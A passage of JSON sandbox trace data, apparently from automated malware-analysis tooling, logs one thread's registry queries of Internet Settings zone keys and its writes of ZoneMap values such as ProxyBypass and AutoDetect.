"return": "0x00000000", "arguments": [ { "name": "KeyHandle", "value": "0x000003d0" }, { "name": "Index", "value": "1" } ], "repeated": 0, "id": 668 }, { "timestamp": "2025-02-27 23:34:22,612", "thread_id": "11036", "caller": "0x764f3bc1", "parentcaller": "0x764f399b", "category": "misc", "api": "RtlSetCurrentTransaction", "status": true, "return": "0x00000001", "arguments": [ { "name": "TransactionHandle", "value": "0x00000000" } ], "repeated": 1, "id": 669 }, { "timestamp": "2025-02-27 23:34:22,612", "thread_id": "11036", "caller": "0x76537309", "parentcaller": "0x764f39ee", "category": "registry", "api": "NtOpenKeyEx", "status": true, "return": "0x00000000", "arguments": [ { "name": "KeyHandle", "value": "0x000003dc" }, { "name": "DesiredAccess", "value": "0x00020019", "pretty_value": "KEY_READ" }, { "name": "ObjectAttributesHandle", "value": "0x00000278" }, { "name": "ObjectAttributesName", "value": "Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Lockdown_Zones\\1" }, { "name": "ObjectAttributes", "value": "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Lockdown_Zones\\1" } ], "repeated": 0, "id": 670 }, { "timestamp": "2025-02-27 23:34:22,612", "thread_id": "11036", "caller": "0x764f3bc1", "parentcaller": "0x764f399b", "category": "misc", "api": "RtlSetCurrentTransaction", "status": true, "return": "0x00000001", "arguments": [ { "name": "TransactionHandle", "value": "0x00000000" } ], "repeated": 1, "id": 671 }, { "timestamp": "2025-02-27 23:34:22,612", "thread_id": "11036", "caller": "0x76537309", "parentcaller": "0x764f39ee", "category": "registry", "api": "NtOpenKeyEx", "status": false, "return": "0xffffffffc0000034", "pretty_return": "OBJECT_NAME_NOT_FOUND", "arguments": [ { "name": "KeyHandle", "value": "0x00000000" }, { "name": "DesiredAccess", "value": "0x00020019", "pretty_value": "KEY_READ" }, { "name": "ObjectAttributesHandle", "value": "0x00000100" }, { "name": "ObjectAttributesName", "value": "Software\\Policies\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Lockdown_Zones\\1" }, { "name": "ObjectAttributes", "value": "HKEY_LOCAL_MACHINE\\Software\\Policies\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Lockdown_Zones\\1" } ], "repeated": 0, "id": 672 }, { "timestamp": "2025-02-27 23:34:22,612", "thread_id": "11036", "caller": "0x764f3bc1", "parentcaller": "0x764f399b", "category": "misc", "api": "RtlSetCurrentTransaction", "status": true, "return": "0x00000001", "arguments": [ { "name": "TransactionHandle", "value": "0x00000000" } ], "repeated": 1, "id": 673 }, { "timestamp": "2025-02-27 23:34:22,612", "thread_id": "11036", "caller": "0x76537309", "parentcaller": "0x764f39ee", "category": "registry", "api": "NtOpenKeyEx", "status": false, "return": "0xffffffffc0000034", "pretty_return": "OBJECT_NAME_NOT_FOUND", "arguments": [ { "name": "KeyHandle", "value": "0x00000000" }, { "name": "DesiredAccess", "value": "0x00020019", "pretty_value": "KEY_READ" }, { "name": "ObjectAttributesHandle", "value": "0x00000278" }, { "name": "ObjectAttributesName", "value": "Software\\Policies\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Lockdown_Zones\\1" }, { "name": "ObjectAttributes", "value": "HKEY_CURRENT_USER\\Software\\Policies\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Lockdown_Zones\\1" } ], "repeated": 0, "id": 674 }, { "timestamp": "2025-02-27 23:34:22,612", "thread_id": "11036", "caller": "0x764f3bc1", "parentcaller": "0x764f399b", "category": "misc", "api": "RtlSetCurrentTransaction", "status": true, "return": "0x00000001", "arguments": [ { "name": "TransactionHandle", "value": "0x00000000" } ], "repeated": 1, "id": 675 }, { "timestamp": "2025-02-27 23:34:22,612", "thread_id": "11036", "caller": "0x76537309", "parentcaller": "0x764f39ee", "category": "registry", "api": "NtOpenKeyEx", "status": false, "return": "0xffffffffc0000034", "pretty_return": "OBJECT_NAME_NOT_FOUND", "arguments": [ { "name": "KeyHandle", "value": "0x00000000" }, { "name": "DesiredAccess", "value": "0x00020019", "pretty_value": "KEY_READ" }, { "name": "ObjectAttributesHandle", "value": "0x00000100" }, { "name": "ObjectAttributesName", "value": "Software\\Policies\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Lockdown_Zones\\1" }, { "name": "ObjectAttributes", "value": "HKEY_LOCAL_MACHINE\\Software\\Policies\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Lockdown_Zones\\1" } ], "repeated": 0, "id": 676 }, { "timestamp": "2025-02-27 23:34:22,612", "thread_id": "11036", "caller": "0x764f3bc1", "parentcaller": "0x764f399b", "category": "misc", "api": "RtlSetCurrentTransaction", "status": true, "return": "0x00000001", "arguments": [ { "name": "TransactionHandle", "value": "0x00000000" } ], "repeated": 1, "id": 677 }, { "timestamp": "2025-02-27 23:34:22,612", "thread_id": "11036", "caller": "0x76537309", "parentcaller": "0x764f39ee", "category": "registry", "api": "NtOpenKeyEx", "status": true, "return": "0x00000000", "arguments": [ { "name": "KeyHandle", "value": "0x000003e0" }, { "name": "DesiredAccess", "value": "0x00020019", "pretty_value": "KEY_READ" }, { "name": "ObjectAttributesHandle", "value": "0x00000278" }, { "name": "ObjectAttributesName", "value": "Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\1" }, { "name": "ObjectAttributes", "value": "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\1" } ], "repeated": 0, "id": 678 }, { "timestamp": "2025-02-27 23:34:22,612", "thread_id": "11036", "caller": "0x7653696a", "parentcaller": "0x764f35f8", "category": "registry", "api": "NtQueryValueKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "KeyHandle", "value": "0x000003e0" }, { "name": "ValueName", "value": "Flags" }, { "name": "Type", "value": "4", "pretty_value": "REG_DWORD" }, { "name": "Information", "value": "219" }, { "name": "FullName", "value": "HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\1\\Flags" } ], "repeated": 0, "id": 679 }, { "timestamp": "2025-02-27 23:34:22,612", "thread_id": "11036", "caller": "0x764f3bc1", "parentcaller": "0x764f399b", "category": "misc", "api": "RtlSetCurrentTransaction", "status": true, "return": "0x00000001", "arguments": [ { "name": "TransactionHandle", "value": "0x00000000" } ], "repeated": 1, "id": 680 }, { "timestamp": "2025-02-27 23:34:22,612", "thread_id": "11036", "caller": "0x76537309", "parentcaller": "0x764f39ee", "category": "registry", "api": "NtOpenKeyEx", "status": true, "return": "0x00000000", "arguments": [ { "name": "KeyHandle", "value": "0x000003e4" }, { "name": "DesiredAccess", "value": "0x0002001f", "pretty_value": "KEY_READ|KEY_WRITE" }, { "name": "ObjectAttributesHandle", "value": "0x00000278" }, { "name": "ObjectAttributesName", "value": "Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\" }, { "name": "ObjectAttributes", "value": "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\" } ], "repeated": 0, "id": 681 }, { "timestamp": "2025-02-27 23:34:22,612", "thread_id": "11036", "caller": "0x765382c5", "parentcaller": "0x764f1662", "category": "registry", "api": "NtSetValueKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "KeyHandle", "value": "0x000003e4" }, { "name": "ValueName", "value": "ProxyBypass" }, { "name": "Type", "value": "4", "pretty_value": "REG_DWORD" }, { "name": "Buffer", "value": "1" }, { "name": "BufferLength", "value": "4" }, { "name": "FullName", "value": "HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\ProxyBypass" } ], "repeated": 0, "id": 682 }, { "timestamp": "2025-02-27 23:34:22,612", "thread_id": "11036", "caller": "0x765382c5", "parentcaller": "0x764f1662", "category": "registry", "api": "NtSetValueKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "KeyHandle", "value": "0x000003e4" }, { "name": "ValueName", "value": "IntranetName" }, { "name": "Type", "value": "4", "pretty_value": "REG_DWORD" }, { "name": "Buffer", "value": "1" }, { "name": "BufferLength", "value": "4" }, { "name": "FullName", "value": "HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\IntranetName" } ], "repeated": 0, "id": 683 }, { "timestamp": "2025-02-27 23:34:22,612", "thread_id": "11036", "caller": "0x765382c5", "parentcaller": "0x764f1662", "category": "registry", "api": "NtSetValueKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "KeyHandle", "value": "0x000003e4" }, { "name": "ValueName", "value": "UNCAsIntranet" }, { "name": "Type", "value": "4", "pretty_value": "REG_DWORD" }, { "name": "Buffer", "value": "1" }, { "name": "BufferLength", "value": "4" }, { "name": "FullName", "value": "HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\UNCAsIntranet" } ], "repeated": 0, "id": 684 }, { "timestamp": "2025-02-27 23:34:22,612", "thread_id": "11036", "caller": "0x765382c5", "parentcaller": "0x764f1662", "category": "registry", "api": "NtSetValueKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "KeyHandle", "value": "0x000003e4" }, { "name": "ValueName", "value": "AutoDetect" }, { "name": "Type", "value": "4", "pretty_value": "REG_DWORD" }, { "name": "Buffer", "value": "0" }, { "name": "BufferLength", "value": "4" }, { "name": "FullName", "value": "HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\AutoDetect" } ], "repeated": 0, "id": 685 }, { "timestamp": "2025-02-27 23:34:22,612", "thread_id": "11036", "caller": "0x764f46db", "parentcaller": "0x764f4c4b", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x000003e4" } ], "repeated": 0, "id": 686 }, { "timestamp": "2025-02-27 23:34:22,612", "thread_id": "11036", "caller": "0x764f46db", "parentcaller": "0x764f4c4b", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x000003e0" } ], "repeated": 0, "id": 687 }, { "timestamp": "2025-02-27 23:34:22,612", "thread_id": "11036", "caller": "0x764f46db", "parentcaller": "0x764f4c4b", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x000003dc" } ], "repeated": 0, "id": 688 }, { "timestamp": "2025-02-27 23:34:22,612", "thread_id": "11036", "caller": "0x76537629", "parentcaller": "0x764f28bb", "category": "registry", "api": "NtEnumerateKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "KeyHandle", "value": "0x000003d0" }, { "name": "Index", "value": "2" } ], "repeated": 0, "id": 689 }, { "timestamp": "2025-02-27 23:34:22,612", "thread_id": "11036", "caller": "0x764f3bc1", "parentcaller": "0x764f399b", "category": "misc", "api": "RtlSetCurrentTransaction", "status": true, "return": "0x00000001", "arguments": [ { "name": "TransactionHandle", "value": "0x00000000" } ], "repeated": 1, "id": 690 }, { "timestamp": "2025-02-27 23:34:22,612", "thread_id": "11036", "caller": "0x76537309", "parentcaller": "0x764f39ee", "category": "registry", "api": "NtOpenKeyEx", "status": true, "return": "0x00000000", "arguments": [ { "name": "KeyHandle", "value": "0x000003dc" }, { "name": "DesiredAccess", "value": "0x00020019", "pretty_value": "KEY_READ" }, { "name": "ObjectAttributesHandle", "value": "0x00000278" }, { "name": "ObjectAttributesName", "value": "Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Lockdown_Zones\\2" }, { "name": "ObjectAttributes", "value": "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Lockdown_Zones\\2" } ], "repeated": 0, "id": 691 }, { "timestamp": "2025-02-27 23:34:22,612", "thread_id": "11036", "caller": "0x764f3bc1", "parentcaller": "0x764f399b", "category": "misc", "api": "RtlSetCurrentTransaction", "status": true, "return": "0x00000001", "arguments": [ { "name": "TransactionHandle", "value": "0x00000000" } ], "repeated": 1, "id": 692 }, { "timestamp": "2025-02-27 23:34:22,612", "thread_id": "11036", "caller": "0x76537309", "parentcaller": "0x764f39ee", "category": "registry", "api": "NtOpenKeyEx", "status": false, "return": "0xffffffffc0000034", "pretty_return": "OBJECT_NAME_NOT_FOUND", "arguments": [ { "name": "KeyHandle", "value": "0x00000000" }, { "name": "DesiredAccess", "value": "0x00020019", "pretty_value": "KEY_READ" }, { "name": "ObjectAttributesHandle", "value": "0x00000100" }, { "name": "ObjectAttributesName", "value": "Software\\Policies\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Lockdown_Zones\\2" }, { "name": "ObjectAttributes", "value": "HKEY_LOCAL_MACHINE\\Software\\Policies\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Lockdown_Zones\\2" } ], "repeated": 0, "id": 693 }, { "timestamp": "2025-02-27 23:34:22,612", "thread_id": "11036", "caller": "0x764f3bc1", "parentcaller": "0x764f399b", "category": "misc", "api": "RtlSetCurrentTransaction", "status": true, "return": "0x00000001", "arguments": [ { "name": "TransactionHandle", "value": "0x00000000" } ], "repeated": 1, "id": 694 }, { "timestamp": "2025-02-27 23:34:22,612", "thread_id": "11036", "caller": "0x76537309", "parentcaller": "0x764f39ee", "category": "registry", "api": "NtOpenKeyEx", "status": false, "return": "0xffffffffc0000034", "pretty_return": "OBJECT_NAME_NOT_FOUND", "arguments": [ { "name": "KeyHandle", "value": "0x00000000" }, { "name": "DesiredAccess", "value": "0x00020019", "pretty_value": "KEY_READ" }, { "name": "ObjectAttributesHandle", "value": "0x00000278" }, { "name": "ObjectAttributesName", "value": "Software\\Policies\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Lockdown_Zones\\2" }, { "name": "ObjectAttributes", "value": "HKEY_CURRENT_USER\\Software\\Policies\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Lockdown_Zones\\2" } ], "repeated": 0, "id": 695 }, { "timestamp": "2025-02-27 23:34:22,612", "thread_id": "11036", "caller": "0x764f3bc1", "parentcaller": "0x764f399b", "category": "misc", "api": "RtlSetCurrentTransaction", "status": true, "return": "0x00000001", "arguments": [ { "name": "TransactionHandle", "value": "0x00000000" } ], "repeated": 1, "id": 696 }, { "timestamp": "2025-02-27 23:34:22,612", "thread_id": "11036", "caller": "0x76537309", "parentcaller": "0x764f39ee", "category": "registry", "api": "NtOpenKeyEx", "status": false, "return": "0xffffffffc0000034", "pretty_return": "OBJECT_NAME_NOT_FOUND", "arguments": [ { "name": "KeyHandle", "value": "0x00000000" }, { "name": "DesiredAccess", "value": "0x00020019", "pretty_value": "KEY_READ" }, { "name": "ObjectAttributesHandle", "value": "0x00000100" }, { "name": "ObjectAttributesName", "value": "Software\\Policies\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Lockdown_Zones\\2" }, { "name": "ObjectAttributes", "value": "HKEY_LOCAL_MACHINE\\Software\\Policies\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Lockdown_Zones\\2" } ], "repeated": 0, "id": 697 }, { "timestamp": "2025-02-27 23:34:22,612", "thread_id": "11036", "caller": "0x764f3bc1", "parentcaller": "0x764f399b", "category": "misc", "api": "RtlSetCurrentTransaction", "status": true, "return": "0x00000001", "arguments": [ { "name": "TransactionHandle", "value": "0x00000000" } ], "repeated": 1, "id": 698 }, { "timestamp": "2025-02-27 23:34:22,612", "thread_id": "11036", "caller": "0x76537309", "parentcaller": "0x764f39ee", "category": "registry", "api": "NtOpenKeyEx", "status": true, "return": "0x00000000", "arguments": [ { "name": "KeyHandle", "value": "0x000003e0" }, { "name": "DesiredAccess", "value": "0x00020019", "pretty_value": "KEY_READ" }, { "name": "ObjectAttributesHandle", "value": "0x00000278" }, { "name": "ObjectAttributesName", "value": "Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\2" }, { "name": "ObjectAttributes", "value": "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\2" } ], "repeated": 0, "id": 699 }, { "timestamp": "2025-02-27 23:34:22,612", "thread_id": "11036", "caller": "0x7653696a", "parentcaller": "0x764f35f8", "category": "registry", "api": "NtQueryValueKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "KeyHandle", "value": "0x000003e0" }, { "name": "ValueName", "value": "Flags" }, { "name": "Type", "value": "4", "pretty_value": "REG_DWORD" }, { "name": "Information", "value": "71" }, { "name": "FullName", "value": "HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\2\\Flags" } ], "repeated": 0, "id": 700 }, { "timestamp": "2025-02-27 23:34:22,612", "thread_id": "11036", "caller": "0x764f46db", "parentcaller": "0x764f4c4b", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x000003e0" } ], "repeated": 0, "id": 701 }, { "timestamp": "2025-02-27 23:34:22,612", "thread_id": "11036", "caller": "0x764f46db", "parentcaller": "0x764f4c4b", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x000003dc" } ], "repeated": 0, "id": 702 }, { "timestamp": "2025-02-27 23:34:22,612", "thread_id": "11036", "caller": "0x76537629", "parentcaller": "0x764f28bb", "category": "registry", "api": "NtEnumerateKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "KeyHandle", "value": "0x000003d0" }, { "name": "Index", "value": "3" } ], "repeated": 0, "id": 703 }, { "timestamp": "2025-02-27 23:34:22,612", "thread_id": "11036", "caller": "0x764f3bc1", "parentcaller": "0x764f399b", "category": "misc", "api": "RtlSetCurrentTransaction", "status": true, "return": "0x00000001", "arguments": [ { "name": "TransactionHandle", "value": "0x00000000" } ], "repeated": 1, "id": 704 }, { "timestamp": "2025-02-27 23:34:22,612", "thread_id": "11036", "caller": "0x76537309", "parentcaller": "0x764f39ee", "category": "registry", "api": "NtOpenKeyEx", "status": true, "return": "0x00000000", "arguments": [ { "name": "KeyHandle", "value": "0x000003dc" }, { "name": "DesiredAccess", "value": "0x00020019", "pretty_value": "KEY_READ" }, { "name": "ObjectAttributesHandle", "value": "0x00000278" }, { "name": "ObjectAttributesName", "value": "Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Lockdown_Zones\\3" }, { "name": "ObjectAttributes", "value": "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Lockdown_Zones\\3" } ], "repeated": 0, "id": 705 }, { "timestamp": "2025-02-27 23:34:22,612", "thread_id": "11036", "caller": "0x764f3bc1", "parentcaller": "0x764f399b", "category": "misc", "api": "RtlSetCurrentTransaction", "status": true, "return": "0x00000001", "arguments": [ { "name": "TransactionHandle", "value": "0x00000000" } ], "repeated": 1, "id": 706 }, { "timestamp": "2025-02-27 23:34:22,612", "thread_id": "11036", "caller": "0x76537309", "parentcaller": "0x764f39ee", "category": "registry", "api": "NtOpenKeyEx", "status": false, "return": "0xffffffffc0000034", "pretty_return": "OBJECT_NAME_NOT_FOUND", "arguments": [ { "name": "KeyHandle", "value": "0x00000000" }, { "name": "DesiredAccess", "value": "0x00020019", "pretty_value": "KEY_READ" }, { "name": "ObjectAttributesHandle", "value": "0x00000100" }, { "name": "ObjectAttributesName", "value": "Software\\Policies\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Lockdown_Zones\\3" }, { "name": "ObjectAttributes", "value": "HKEY_LOCAL_MACHINE\\Software\\Policies\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Lockdown_Zones\\3" } ], "repeated": 0, "id": 707 }, { "timestamp": "2025-02-27 23:34:22,612", "thread_id": "11036", "caller": "0x764f3bc1", "parentcaller": "0x764f399b", "category": "misc", "api": "RtlSetCurrentTransaction", "status": true, "return": "0x00000001", "arguments": [ { "name": "TransactionHandle", "value": "0x00000000" } ], "repeated": 1, "id": 708 }, { "timestamp": "2025-02-27 23:34:22,612", "thread_id": "11036", "caller": "0x76537309", "parentcaller": "0x764f39ee", "category": "registry", "api": "NtOpenKeyEx", "status": false, "return": "0xffffffffc0000034", "pretty_return": "OBJECT_NAME_NOT_FOUND", "arguments": [ { "name": "KeyHandle", "value": "0x00000000" }, { "name": "DesiredAccess", "value": "0x00020019", "pretty_value": "KEY_READ" }, { "name": "ObjectAttributesHandle", "value": "0x00000278" }, { "name": "ObjectAttributesName", "value": "Software\\Policies\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Lockdown_Zones\\3" }, { "name": "ObjectAttributes", "value": "HKEY_CURRENT_USER\\Software\\Policies\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Lockdown_Zones\\3" } ], "repeated": 0, "id": 709 }, { "timestamp": "2025-02-27 23:34:22,612", "thread_id": "11036", "caller": "0x764f3bc1", "parentcaller": "0x764f399b", "category": "misc", "api": "RtlSetCurrentTransaction", "status": true, "return": "0x00000001", "arguments": [ { "name": "TransactionHandle", "value": "0x00000000" } ], "repeated": 1, "id": 710 }, { "timestamp": "2025-02-27 23:34:22,612", "thread_id": "11036", "caller": "0x76537309", "parentcaller": "0x764f39ee", "category": "registry", "api": "NtOpenKeyEx", "status": false, "return": "0xffffffffc0000034", "pretty_return": "OBJECT_NAME_NOT_FOUND", "arguments": [ { "name": "KeyHandle", "value": "0x00000000" }, { "name": "DesiredAccess", "value": "0x00020019", "pretty_value": "KEY_READ" }, { "name": "ObjectAttributesHandle", "value": "0x00000100" }, { "name": "ObjectAttributesName", "value": "Software\\Policies\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Lockdown_Zones\\3" }, { "name": "ObjectAttributes", "value": "HKEY_LOCAL_MACHINE\\Software\\Policies\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Lockdown_Zones\\3" } ], "repeated": 0, "id": 711 }, { "timestamp": "2025-02-27 23:34:22,612", "thread_id": "11036", "caller": "0x764f3bc1", "parentcaller": "0x764f399b", "category": "misc", "api": "RtlSetCurrentTransaction", "status": true, "return": "0x00000001", "arguments": [ { "name": "TransactionHandle", "value": "0x00000000" } ], "repeated": 1, "id": 712 }, { "timestamp": "2025-02-27 23:34:22,612", "thread_id": "11036", "caller": "0x76537309", "parentcaller": "0x764f39ee", "category": "registry", "api": "NtOpenKeyEx", "status": true, "return": "0x00000000", "arguments": [ { "name": "KeyHandle", "value": "0x000003e0" }, { "name": "DesiredAccess", "value": "0x00020019", "pretty_value": "KEY_READ" }, { "name": "ObjectAttributesHandle", "value": "0x00000278" }, { "name": "ObjectAttributesName", "value": "Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\3" }, { "name": "ObjectAttributes", "value": "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\3" } ], "repeated": 0, "id": 713 }, { "timestamp": "2025-02-27 23:34:22,612", "thread_id": "11036", "caller": "0x7653696a", "parentcaller": "0x764f35f8", "category": "registry", "api": "NtQueryValueKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "KeyHandle", "value": "0x000003e0" }, { "name": "ValueName", "value": "Flags" }, { "name": "Type", "value": "4", "pretty_value": "REG_DWORD" }, { "name": "Information", "value": "1" }, { "name": "FullName", "value": "HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\3\\Flags" } ], "repeated": 0, "id": 714 }, { "timestamp": "2025-02-27 23:34:22,612", "thread_id": "11036", "caller": "0x764f46db", "parentcaller": "0x764f4c4b", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x000003e0" } ], "repeated": 0, "id": 715 }, { "timestamp": "2025-02-27 23:34:22,612", "thread_id": "11036", "caller": "0x764f46db", "parentcaller": "0x764f4c4b", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x000003dc" } ], "repeated": 0, "id": 716 }, { "timestamp": "2025-02-27 23:34:22,612", "thread_id": "11036", "caller": "0x76537629", "parentcaller": "0x764f28bb", "category": "registry", "api": "NtEnumerateKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "KeyHandle", "value": "0x000003d0" }, { "name": "Index", "value": "4" } ], "repeated": 0, "id": 717 }, { "timestamp": "2025-02-27 23:34:22,612", "thread_id": "11036", "caller": "0x764f3bc1", "parentcaller": "0x764f399b", "category": "misc", "api": "RtlSetCurrentTransaction", "status": true, "return": "0x00000001", "arguments": [ { "name": "TransactionHandle", "value": "0x00000000" } ], "repeated": 1, "id": 718 }, { "timestamp": "2025-02-27 23:34:22,612", "thread_id": "11036", "caller": "0x76537309", "parentcaller": "0x764f39ee", "category": "registry", "api": "NtOpenKeyEx", "status": true, "return": "0x00000000", "arguments": [ { "name": "KeyHandle", "value": "0x000003dc" }, { "name": "DesiredAccess", "value": "0x00020019", "pretty_value": "KEY_READ" }, { "name": "ObjectAttributesHandle", "value": "0x00000278" }, { "name": "ObjectAttributesName", "value": "Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Lockdown_Zones\\4" }, { "name": "ObjectAttributes", "value": "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Lockdown_Zones\\4" } ], "repeated": 0, "id": 719 }, { "timestamp": "2025-02-27 23:34:22,612", "thread_id": "11036", "caller": "0x764f3bc1", "parentcaller": "0x764f399b", "category": "misc", "api": "RtlSetCurrentTransaction", "status": true, "return": "0x00000001", "arguments": [ { "name": "TransactionHandle", "value": "0x00000000" } ], "repeated": 1, "id": 720 }, { "timestamp": "2025-02-27 23:34:22,612", "thread_id": "11036", "caller": "0x76537309", "parentcaller": "0x764f39ee", "category": "registry", "api": "NtOpenKeyEx", "status": false, "return": "0xffffffffc0000034", "pretty_return": "OBJECT_NAME_NOT_FOUND", "arguments": [ { "name": "KeyHandle", "value": "0x00000000" }, { "name": "DesiredAccess", "value": "0x00020019", "pretty_value": "KEY_READ" }, { "name": "ObjectAttributesHandle", "value": "0x00000100" }, { "name": "ObjectAttributesName", "value": "Software\\Policies\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Lockdown_Zones\\4" }, { "name": "ObjectAttributes", "value": "HKEY_LOCAL_MACHINE\\Software\\Policies\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Lockdown_Zones\\4" } ], "repeated": 0, "id": 721 }, { "timestamp": "2025-02-27 23:34:22,612", "thread_id": "11036", "caller": "0x764f3bc1", "parentcaller": "0x764f399b", "category": "misc", "api": "RtlSetCurrentTransaction", "status": true, "return": "0x00000001", "arguments": [ { "name": "TransactionHandle", "value": "0x00000000" } ], "repeated": 1, "id": 722 }, { "timestamp": "2025-02-27 23:34:22,612", "thread_id": "11036", "caller": "0x76537309", "parentcaller": "0x764f39ee", "category": "registry", "api": "NtOpenKeyEx", "status": false, "return": "0xffffffffc0000034", "pretty_return": "OBJECT_NAME_NOT_FOUND", "arguments": [ { "name": "KeyHandle", "value": "0x00000000" }, { "name": "DesiredAccess", "value": "0x00020019", "pretty_value": "KEY_READ" }, { "name": "ObjectAttributesHandle", "value": "0x00000278" }, { "name": "ObjectAttributesName", "value": "Software\\Policies\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Lockdown_Zones\\4" }, { "name": "ObjectAttributes", "value": "HKEY_CURRENT_USER\\Software\\Policies\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Lockdown_Zones\\4" } ], "repeated": 0, "id": 723 }, { "timestamp": "2025-02-27 23:34:22,612", "thread_id": "11036", "caller": "0x764f3bc1", "parentcaller": "0x764f399b", "category": "misc", "api": "RtlSetCurrentTransaction", "status": true, "return": "0x00000001", "arguments": [ { "name": "TransactionHandle", "value": "0x00000000" } ], "repeated": 1, "id": 724 }, { "timestamp": "2025-02-27 23:34:22,612", "thread_id": "11036", "caller": "0x76537309", "parentcaller": "0x764f39ee", "category": "registry", "api": "NtOpenKeyEx", "status": false, "return": "0xffffffffc0000034", "pretty_return": "OBJECT_NAME_NOT_FOUND", "arguments": [ { "name": "KeyHandle", "value": "0x00000000" }, { "name": "DesiredAccess", "value": "0x00020019", "pretty_value": "KEY_READ" }, { "name": "ObjectAttributesHandle", "value": "0x00000100" }, { "name": "ObjectAttributesName", "value": "Software\\Policies\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Lockdown_Zones\\4" }, { "name": "ObjectAttributes", "value": "HKEY_LOCAL_MACHINE\\Software\\Policies\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Lockdown_Zones\\4" } ], "repeated": 0, "id": 725 }, { "timestamp": "2025-02-27 23:34:22,612", "thread_id": "11036", "caller": "0x764f3bc1", "parentcaller": "0x764f399b", "category": "misc", "api": "RtlSetCurrentTransaction", "status": true, "return": "0x00000001", "arguments": [ { "name": "TransactionHandle", "value": "0x00000000" } ], "repeated": 1, "id": 726 }, { "timestamp": "2025-02-27 23:34:22,612", "thread_id": "11036", "caller": "0x76537309", "parentcaller": "0x764f39ee", "category": "registry", "api": "NtOpenKeyEx", "status": true, "return": "0x00000000", "arguments": [ { "name": "KeyHandle", "value": "0x000003e0" }, { "name": "DesiredAccess", "value": "0x00020019", "pretty_value": "KEY_READ" }, { "name": "ObjectAttributesHandle", "value": "0x00000278" }, { "name": "ObjectAttributesName", "value": "Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\4" }, { "name": "ObjectAttributes", "value": "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\4" } ], "repeated": 0, "id": 727 }, { "timestamp": "2025-02-27 23:34:22,612", "thread_id": "11036", "caller": "0x7653696a", 